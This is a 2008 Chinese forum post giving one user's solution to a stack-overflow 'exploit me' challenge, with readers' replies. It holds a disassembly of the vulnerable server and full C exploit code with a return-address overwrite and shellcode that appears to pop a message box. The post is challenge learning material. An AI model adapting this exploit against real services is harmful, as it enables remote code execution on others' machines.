-
-
[原创]辞旧迎新exploit me挑战赛我的答案
-
发表于: 2008-1-2 07:06
-
提交时间已经过了,那么我就可以发帖子混篇精华了。首先我声明,溢出我是个门外汉,答案不一定正确,仅供参考。
首先看A题,打开OD,看到EP处的代码
不用怀疑,它是标准的VC6.0生成的.OK,水话说完了
.
我们直接来看看main()函数的代码.
004010B0 /$ 81EC B4030000 sub esp, 3B4 004010B6 |. 8D8424 240200>lea eax, dword ptr [esp+224] 004010BD |. 55 push ebp 004010BE |. 50 push eax ; /pWSAData 004010BF |. 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.) 004010C4 |. FF15 BC804000 call dword ptr [<&WS2_32.#115>] ; \WSAStartup 004010CA |. 6A 00 push 0 ; /Protocol = IPPROTO_IP 004010CC |. 6A 01 push 1 ; |Type = SOCK_STREAM 004010CE |. 6A 02 push 2 ; |Family = AF_INET 004010D0 |. FF15 C0804000 call dword ptr [<&WS2_32.#23>] ; \socket 004010D6 |. 8BE8 mov ebp, eax 004010D8 |. 85ED test ebp, ebp 004010DA |. 7D 33 jge short 0040110F 004010DC |. 68 00914000 push 00409100 ; ASCII "socket creating error!" 004010E1 |. 55 push ebp ; /Arg1 004010E2 |. B9 689A4000 mov ecx, 00409A68 ; | 004010E7 |. E8 0C070000 call 004017F8 ; \exploit_.004017F8 004010EC |. 8BC8 mov ecx, eax 004010EE |. E8 34030000 call 00401427 004010F3 |. 68 D0124000 push 004012D0 004010F8 |. 6A 0A push 0A ; /Arg1 = 0000000A 004010FA |. 8BC8 mov ecx, eax ; | 004010FC |. E8 DF010000 call 004012E0 ; \exploit_.004012E0 00401101 |. 8BC8 mov ecx, eax 00401103 |. E8 A8010000 call 004012B0 00401108 |. 6A 01 push 1 0040110A |. E8 430E0000 call 00401F52 0040110F |> 68 611E0000 push 1E61 ; /NetShort = 1E61 00401114 |. 66:C74424 0C >mov word ptr [esp+C], 2 ; | 0040111B |. FF15 C4804000 call dword ptr [<&WS2_32.#9>] ; \ntohs 00401121 |. 6A 00 push 0 ; /NetLong = 0 00401123 |. 66:894424 0E mov word ptr [esp+E], ax ; | 00401128 |. FF15 C8804000 call dword ptr [<&WS2_32.#8>] ; \ntohl 0040112E |. 8D4C24 08 lea ecx, dword ptr [esp+8] 00401132 |. 6A 10 push 10 ; /AddrLen = 10 (16.) 00401134 |. 51 push ecx ; |pSockAddr 00401135 |. 55 push ebp ; |Socket 00401136 |. 894424 18 mov dword ptr [esp+18], eax ; | 0040113A |. FF15 CC804000 call dword ptr [<&WS2_32.#2>] ; \bind 00401140 |. 85C0 test eax, eax 00401142 |. 74 24 je short 00401168 00401144 |. 68 E0904000 push 004090E0 ; ASCII "binding stream socket error!" 00401149 |. B9 689A4000 mov ecx, 00409A68 0040114E |. E8 D4020000 call 00401427 00401153 |. 68 D0124000 push 004012D0 00401158 |. 6A 0A push 0A ; /Arg1 = 0000000A 0040115A |. 8BC8 mov ecx, eax ; | 0040115C |. E8 7F010000 call 004012E0 ; \exploit_.004012E0 00401161 |. 8BC8 mov ecx, eax 00401163 |. E8 48010000 call 004012B0 00401168 |> 53 push ebx 00401169 |. 68 B8904000 push 004090B8 ; ASCII "**************************************" 0040116E |. B9 689A4000 mov ecx, 00409A68 00401173 |. E8 AF020000 call 00401427 00401178 |. 68 D0124000 push 004012D0 0040117D |. 6A 0A push 0A ; /Arg1 = 0000000A 0040117F |. 8BC8 mov ecx, eax ; | 00401181 |. E8 5A010000 call 004012E0 ; \exploit_.004012E0 00401186 |. 8BC8 mov ecx, eax 00401188 |. E8 23010000 call 004012B0 0040118D |. 68 94904000 push 00409094 ; ASCII " exploit target server 1.0",TAB," " 00401192 |. B9 689A4000 mov ecx, 00409A68 00401197 |. E8 8B020000 call 00401427 0040119C |. 68 D0124000 push 004012D0 004011A1 |. 6A 0A push 0A ; /Arg1 = 0000000A 004011A3 |. 8BC8 mov ecx, eax ; | 004011A5 |. E8 36010000 call 004012E0 ; \exploit_.004012E0 004011AA |. 8BC8 mov ecx, eax 004011AC |. E8 FF000000 call 004012B0 004011B1 |. 68 B8904000 push 004090B8 ; ASCII "**************************************" 004011B6 |. B9 689A4000 mov ecx, 00409A68 004011BB |. E8 67020000 call 00401427 004011C0 |. 68 D0124000 push 004012D0 004011C5 |. 6A 0A push 0A ; /Arg1 = 0000000A 004011C7 |. 8BC8 mov ecx, eax ; | 004011C9 |. E8 12010000 call 004012E0 ; \exploit_.004012E0 004011CE |. 8BC8 mov ecx, eax 004011D0 |. E8 DB000000 call 004012B0 004011D5 |. 6A 04 push 4 ; /Backlog = 4 004011D7 |. 55 push ebp ; |Socket 004011D8 |. FF15 D0804000 call dword ptr [<&WS2_32.#13>] ; \listen 004011DE |. 8D5424 08 lea edx, dword ptr [esp+8] 004011E2 |. 8D4424 1C lea eax, dword ptr [esp+1C] 004011E6 |. 52 push edx ; /pAddrLen 004011E7 |. 50 push eax ; |pSockAddr 004011E8 |. 55 push ebp ; |Socket 004011E9 |. C74424 14 100>mov dword ptr [esp+14], 10 ; | 004011F1 |. FF15 D4804000 call dword ptr [<&WS2_32.#1>] ; \accept 004011F7 |. 8BD8 mov ebx, eax 004011F9 |. 83FB FF cmp ebx, -1 004011FC |. 74 7F je short 0040127D 004011FE |. 56 push esi 004011FF |. 57 push edi 00401200 |> B9 80000000 /mov ecx, 80 00401205 |. 33C0 |xor eax, eax 00401207 |. 8D7C24 34 |lea edi, dword ptr [esp+34] 0040120B |. 50 |push eax ; /Flags => 0 0040120C |. F3:AB |rep stos dword ptr es:[edi] ; | 0040120E |. 8D4C24 38 |lea ecx, dword ptr [esp+38] ; | 00401212 |. 68 00020000 |push 200 ; |BufSize = 200 (512.) 00401217 |. 51 |push ecx ; |Buffer 00401218 |. 53 |push ebx ; |Socket 00401219 |. FF15 D8804000 |call dword ptr [<&WS2_32.#16>] ; \recv 0040121F |. 8BF0 |mov esi, eax 00401221 |. 85F6 |test esi, esi 00401223 |. 7D 26 |jge short 0040124B 00401225 |. 68 74904000 |push 00409074 ; ASCII "reading stream message erro!" 0040122A |. B9 689A4000 |mov ecx, 00409A68 0040122F |. E8 F3010000 |call 00401427 00401234 |. 68 D0124000 |push 004012D0 00401239 |. 6A 0A |push 0A ; /Arg1 = 0000000A 0040123B |. 8BC8 |mov ecx, eax ; | 0040123D |. E8 9E000000 |call 004012E0 ; \exploit_.004012E0 00401242 |. 8BC8 |mov ecx, eax 00401244 |. E8 67000000 |call 004012B0 00401249 |. 33F6 |xor esi, esi 0040124B |> 8D5424 34 |lea edx, dword ptr [esp+34] 0040124F |. 52 |push edx 00401250 |. E8 ABFDFFFF |call 00401000 00401255 |. 83C4 04 |add esp, 4 00401258 |. 85F6 |test esi, esi 0040125A |.^ 75 A4 |jnz short 00401200 0040125C |. 53 |push ebx ; /Socket 0040125D |. FF15 DC804000 |call dword ptr [<&WS2_32.#3>] ; \closesocket 00401263 |. 8D4424 10 |lea eax, dword ptr [esp+10] 00401267 |. 8D4C24 24 |lea ecx, dword ptr [esp+24] 0040126B |. 50 |push eax ; /pAddrLen 0040126C |. 51 |push ecx ; |pSockAddr 0040126D |. 55 |push ebp ; |Socket 0040126E |. FF15 D4804000 |call dword ptr [<&WS2_32.#1>] ; \accept 00401274 |. 8BD8 |mov ebx, eax 00401276 |. 83FB FF |cmp ebx, -1 00401279 |.^ 75 85 \jnz short 00401200 0040127B |. 5F pop edi 0040127C |. 5E pop esi 0040127D |> 68 64904000 push 00409064 ; ASCII "accept error!" 00401282 |. B9 689A4000 mov ecx, 00409A68 00401287 |. E8 9B010000 call 00401427 0040128C |. 68 D0124000 push 004012D0 00401291 |. 6A 0A push 0A ; /Arg1 = 0000000A 00401293 |. 8BC8 mov ecx, eax ; | 00401295 |. E8 46000000 call 004012E0 ; \exploit_.004012E0 0040129A |. 8BC8 mov ecx, eax 0040129C |. E8 0F000000 call 004012B0 004012A1 |. FF15 E0804000 call dword ptr [<&WS2_32.#116>] ; [WSACleanup 004012A7 |. 5B pop ebx 004012A8 |. 5D pop ebp 004012A9 |. 81C4 B4030000 add esp, 3B4 004012AF \. C3 retn
// exploitA.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")
BYTE shellcode[0x200] =
{
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xED\x1E\x96\x7C"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6F\x68\x6F\x0A\x68\x62\x75\x67\x68\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
};
int _tmain(int argc, _TCHAR* argv[])
{
WORD version;
WSADATA wsaData;
int rVal=0;
version = MAKEWORD(1,1);
WSAStartup(version,(LPWSADATA)&wsaData);
LPHOSTENT hostEntry;
//store information about the server
hostEntry = gethostbyname("127.0.0.1");
if(!hostEntry)
{
printf("Failed gethostbyname()");
WSACleanup();
return 0;
}
//create the socket
SOCKET theSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(theSocket == SOCKET_ERROR)
{
printf("Failed socket()");
return 0;
}
//Fill in the sockaddr_in struct
SOCKADDR_IN serverInfo;
serverInfo.sin_family = PF_INET;
serverInfo.sin_addr = *((LPIN_ADDR)*hostEntry->h_addr_list);
serverInfo.sin_port = htons(7777);
rVal=connect(theSocket,(LPSOCKADDR)&serverInfo, sizeof(serverInfo));
if(rVal==SOCKET_ERROR)
{
printf("Failed connect()");
return 0;
}
send(theSocket,(const char*)shellcode,0x200,0);
return 0;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
呵呵,这次比赛看好楼主了
学习ing...... |
|
|
学习!
这次你好像没有F5 
|
|
|
|
|
|
学习。。。精彩
|
|
|
我看好你
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
我也是在此处卡住,以前没想过要搞溢出,漏洞是发现了,写起SHELL才发现不是那么容易
|
|
|
|
|
|
学习学习
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
